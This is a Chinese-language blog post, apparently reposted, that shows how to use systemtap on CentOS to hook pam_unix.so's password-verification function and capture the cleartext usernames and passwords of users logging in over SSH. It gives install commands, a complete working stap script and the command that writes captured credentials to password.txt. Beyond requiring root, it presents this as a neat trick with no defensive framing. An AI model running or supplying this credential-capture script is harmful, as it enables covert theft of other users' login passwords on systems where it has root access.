使用systemtap抓取ssh登录的用户名和密码

08/12/2013 01:17:38安全1 9,115字数 1239阅读4分7秒阅读模式

systemtap是一款非常强大内核调试工具，可以debug很多关于kernel层的问题。Linux是通过PAM模块检测用户信息和认证信息的，从而确定一个用户是否可以登录系统，利用这个知识点，使用systemtap捕获一下pam_unix.so该动态库文件的函数调用，获得用户在ssh远程登录时的用户名和密码吧。

测试环境：CentOS6.4 32bit文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

内核版本：2.6.32-358.el6.i686文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

首先安装以下rpm包文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

# yum --releasever=6.4 update
# yum install -y systemtap
# debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

创建文件，写入以下代码文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

# touch /root/capture_pass.stp

    #!/usr/bin/stap
    global username, pass, isSuccRet = 1;
    probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
    {
    username = user_string($name);
    pass = user_string($p);
    }
    probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
    {
    if ($return == 0)
    {
    printf("User: %s\nPassword: %s\n\n", username, pass);
    isSuccRet = 0;
    }
    }
    probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
    {
    if (isSuccRet != 0)
    {
    printf("Login via ssh service.\n\User: %s\nPassword: %s\n\n", username, pass);
    }
    isSuccRet = 1;
    }

文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

赋予可执行权限
chmod +x capture_pass.stp
创建一个记录密码的文件
touch password.txt
执行systemstap脚本
stap capture_pass.stp -o password.txt文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

本地执行capture_pass.stp脚本，同时ssh远程登录系统，即使第一次登录失败也没有问题，不会记录尝试输入的错误密码。登录成功后 ctl+C终止脚本运行，查看password.txt，成功捕获。systemstap很强大的利器，所以只有超户可以使用。
文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

转自：http://blog.chinaunix.net/uid-29242873-id-4018526.html文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/文章源自运维生存时间-https://www.ttlsa.com/safe/systemtap-get-ssh-password/

我的微信

微信公众号

扫一扫关注运维生存时间公众号，获取最新技术文章~